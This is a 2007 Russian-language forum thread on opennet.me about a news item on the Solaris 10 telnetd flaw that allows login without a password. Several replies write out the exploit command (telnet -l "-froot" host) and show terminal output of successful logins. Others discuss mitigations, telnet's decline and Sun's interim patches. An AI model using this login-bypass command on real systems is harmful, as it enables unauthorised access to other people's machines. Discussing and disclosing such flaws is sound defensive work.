URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 36695
[ Назад ]

Исходное сообщение
"OpenNews: Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено opennews , 13-Фев-07 14:51

В стандартном telnet сервисе (in.telnetd) Solaris 10 обнаружена (http://secunia.com/advisories/24120/) уязвимость позволяющая без лишних усилий получить доступ к системе путем комбинации -l и -f опций.

Например, для входа на удаленную систему без пароля под пользователем root достаточно набрать: telnet -l "-froot" host. Суть в передаче аргумента опции "-l" программе login без проверки, login в свою очередь интерпретирует "-f" - как вход без запроса пароля.

Исправление проблемы еще не анонсировано Sun Microsystems, поэтому крайне рекомендуется отключить in.telnetd сервис или заблокировать пакетным фильтром 23 tcp порт.

Примечательно, что в 1994 году идентичная проблема
была найдена (http://osvdb.org/displayvuln.php?osvdb_id=1007) в сервисе rlogin операционной системы AIX.
URL: http://blogs.securiteam.com/index.php/archives/814
Новость: http://www.opennet.me/opennews/art.shtml?num=9842

Содержание

Критическая проблема безопасности в telnet сервисе Solaris,dvg_lab, 14:51 , 13-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,lomo, 15:34 , 13-Фев-07
- Критическая проблема безопасности в telnet сервисе Solaris,alk, 11:10 , 14-Фев-07
  - Критическая проблема безопасности в telnet сервисе Solaris,Аноним, 11:56 , 14-Фев-07
    - Критическая проблема безопасности в telnet сервисе Solaris,alk, 14:49 , 14-Фев-07
      - Критическая проблема безопасности в telnet сервисе Solaris,мимоход, 19:36 , 17-Фев-07
- Давно так не офигевал от Соляры..,Квагга, 22:13 , 14-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,Андрей, 15:57 , 13-Фев-07
- Критическая проблема безопасности в telnet сервисе Solaris,mike_t, 15:59 , 13-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,Advanced Аноним, 15:59 , 13-Фев-07
- Критическая проблема безопасности в telnet сервисе Solaris,Advanced Аноним, 15:59 , 13-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,ABorland, 16:19 , 13-Фев-07
- Критическая проблема безопасности в telnet сервисе Solaris,lionGAD, 16:51 , 13-Фев-07
  - Критическая проблема безопасности в telnet сервисе Solaris,Dmitry, 17:06 , 13-Фев-07
    - Критическая проблема безопасности в telnet сервисе Solaris,lionGAD, 17:17 , 13-Фев-07
      - Критическая проблема безопасности в telnet сервисе Solaris,Pavel, 17:54 , 13-Фев-07
  - Критическая проблема безопасности в telnet сервисе Solaris,emp, 19:03 , 13-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,iptables, 17:12 , 13-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,Хомяк, 17:21 , 13-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,adil_18, 17:33 , 13-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,Oles, 17:55 , 13-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,L.Torvalds, 18:44 , 13-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,Аноним, 19:21 , 13-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,morph, 20:03 , 13-Фев-07
- Критическая проблема безопасности в telnet сервисе Solaris,гость, 21:40 , 13-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,fi, 21:39 , 13-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,Аноним, 23:59 , 13-Фев-07
- Критическая проблема безопасности в telnet сервисе Solaris,ламусанонимус, 00:09 , 14-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,Аноним, 07:51 , 14-Фев-07
- Критическая проблема безопасности в telnet сервисе Solaris,FSA, 21:45 , 14-Фев-07
Критическая проблема безопасности в telnet сервисе Solaris,Аноним, 12:15 , 14-Фев-07

Сообщения в этом обсуждении

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено dvg_lab , 13-Фев-07 14:51

к вопросу о том кто у кого код слямзил :-)

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено lomo , 13-Фев-07 15:34

Давно так не офигевал от Соляры..
Промышленные, блин, системы...
(from linux server to solaris 10 x86 U3 + patches)
$ telnet -l"-fjimb" sol10
Trying 10.10.14.3...
Connected to sol10.
Escape character is '^]'.
Last login: Mon Feb 12 12:05:20 from rhel4es-sb
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
[jimb@sol10(pts/1) ~]$

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено alk , 14-Фев-07 11:10

что то я не понимаю ... у меня такой номер не прошел
[root@main:/] #telnet -l"froot" 10.0.0.2
Trying 10.0.0.2...
Connected to 10.0.0.2.
Escape character is '^]'.

SunOS 5.10
Password:

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Аноним , 14-Фев-07 11:56

telnet -l "-froot" 10.0.0.2

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено alk , 14-Фев-07 14:49

Мда.... нехило
[root@main:/] #telnet -l"falk" 10.0.0.2
Trying 10.0.0.2...
Connected to 10.0.0.2.
Escape character is '^]'.
SunOS 5.10
Sourcing //.profile-EIS.....
alk@cnr1 # uname -a
SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено мимоход , 17-Фев-07 19:36

что-то у меня работает только на десятке, и то не под рутом, на девятке - нет.
>Мда.... нехило
>[root@main:/] #telnet -l"falk" 10.0.0.2
>Trying 10.0.0.2...
>Connected to 10.0.0.2.
>Escape character is '^]'.
>
>SunOS 5.10
>
>Sourcing //.profile-EIS.....
>alk@cnr1 # uname -a
>SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210

"Давно так не офигевал от Соляры.."
Отправлено Квагга , 14-Фев-07 22:13

А Соляра другой, простите, ни одного дня не была.
Вот уже с 95-го на моей памяти все дыры в ней были строго ГОМЕРИЧЕСКОГО масштаба.
Отродясь это было визиткой Соляры.

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Андрей , 13-Фев-07 15:57

Нормальные люди отключают телнет ( по крайней мере для доступа из инета и др. небезопасных сетей )

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено mike_t , 13-Фев-07 15:59

telnets тоже не использовать?

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Advanced Аноним , 13-Фев-07 15:59

я уверен что число машин с включённым telnetd мизерно, так что, хоть сам факт такой глупой ошибки и вызывает непонятные чувства, но никак не подрывает авторитет Solaris...

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Advanced Аноним , 13-Фев-07 15:59

Кстати, в адвойзари ошибка, под рутом в дефолтной инсталляции нельзя зайти. Только под каким-нибудь другим юзером.

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено ABorland , 13-Фев-07 16:19

Неужели кто то еще пользуется телнетом?

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено lionGAD , 13-Фев-07 16:51

конечно..
например у меня вся безопасность лежит на плечах цысок и внутри сети серверы максимально разгружены и бегают по телнету и rsh к друг другу в гости..

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Dmitry , 13-Фев-07 17:06

че правда и внутри телнет руту открыт ?
ну вы отважный перец :-)
хотя бы защиту от дурака предусмотрели, а то у нас один клоун вместо
контроллера сам домен на Sun Fire так вот ребутнул по ошибке, так сразу
все по-нормальному вывели ......

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено lionGAD , 13-Фев-07 17:17

> че правда и внутри телнет руту открыт ?
>ну вы отважный перец :-)
>хотя бы защиту от дурака предусмотрели, а то у нас один клоун вместо
>контроллера сам домен на Sun Fire так вот ребутнул по ошибке, так сразу
>все по-нормальному вывели ......
у меня в сети дураков нету.. не та сеть, не те задачи... просто я привёл пример что телнет всё таки нужен

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Pavel , 13-Фев-07 17:54

Дураки есть везде, в том числе и на этом сайте в постах

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено emp , 13-Фев-07 19:03

у нормальных админов все эти телнеты и рсаши бегают в отдельном влане.

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено iptables , 13-Фев-07 17:12

Ну и ну, телнет действительно не актуален, но проблемма есть. Что касается удалённого входа, то не думаю, что админ оставит открытым телнет для инета, ибо это уже не админ...

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Хомяк , 13-Фев-07 17:21

Да Солярку в Сеть вообще лучше не выставлять :-)))

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено adil_18 , 13-Фев-07 17:33

да уж

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Oles , 13-Фев-07 17:55

Промышленная система ;)
SunOS 5.10 Generic_118855-14 i86pc i386 i86pc
df -h показывает
/dev/md/dsk/d50 825G 16384E 1.2T 2152924666864% /somemount
df -k показывает
/dev/md/dsk/d50 865477325 18446744073261050460 1305323708 2152924666864% /somemount
эх, бардак...

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено L.Torvalds , 13-Фев-07 18:44

Ну чего раскудахтались? Ошибки у всех бывают :) Хотя конечно неприято ...
По делу надо добавить:
- подвержены _только_ Solaris 10. Старые соляры все держат пучком :)
- root'ом не зайдешь. Можно только юзером. Утешение слабое, но на безрыбьи ...
Самое паскудное - патча нет. Второй день пошел. Для тех кому telnet таки нужен, очень "горячий" второй fu*ng день :-/

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Аноним , 13-Фев-07 19:21

а на Sol9 sun не работает это

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено morph , 13-Фев-07 20:03

телнет к сожалению остался на еще момедах, коммутаторах и прочей лабуде. Интересно, неужели sshd на сервере хавает ресурсов больше? Вернее...неверно вопрос задал - в масштабе производительности хорошего сервера (даже на x86) будет заметна разница?

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено гость , 13-Фев-07 21:40

Если железо не на помойке подобрано, то ничего заметно не будет при условии что количество сессий и объем трафика в них не выражаются 4х значными числами.

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено fi , 13-Фев-07 21:39

Многие проги под виндоус исторически заточены работать с сервером без ssh. Конечно, все внутри, но где гарантия , что изнутри нет желающих.
Более того, когда у нас админы опечаленные положением дел, без предупреждения закрыли сервисы (telnet и rexec) - народ взвыл! открыли в тот же вечер - переконфигурировать всех клиентов было не реально :))))

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Аноним , 13-Фев-07 23:59

Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим telnet, на рутера и сервера - ssh only.

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено ламусанонимус , 14-Фев-07 00:09

>Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим
>telnet, на рутера и сервера - ssh only.
Напоминает виндузевый подход - если с фаерволом, антивирусом и браузер не IE использовать то даже вроде и не очень дырявая система получается :)

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Аноним , 14-Фев-07 07:51

Да лан, что никто не помнит дыру в том же телнете под четвертой фряхой ?

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено FSA , 14-Фев-07 21:45

Сколько себя помню, а начинал с FreeBSD 4.x, ни разу не пользовался телнетом... В голову просто не приходило, SSH хватает.

"Критическая проблема безопасности в telnet сервисе Solaris"
Отправлено Аноним , 14-Фев-07 12:15

ISR (Interim Security Relief) patches are now available for the Solaris 10
in.telnetd vulnerability from http://sunsolve.sun.com/tpatches
The Descriptions and readme links are currently empty, but they should be there
shortly.
The ISR's are :
IDR125456-01.zip - Solaris 10 SPARC
IDR125457-01.zip - Solaris 10 x86
Patch 120068-01 (SPARC) or 120069-01 (x86) are required patches, however none of
these patches/ISR's require a reboot and they will take effect immediately.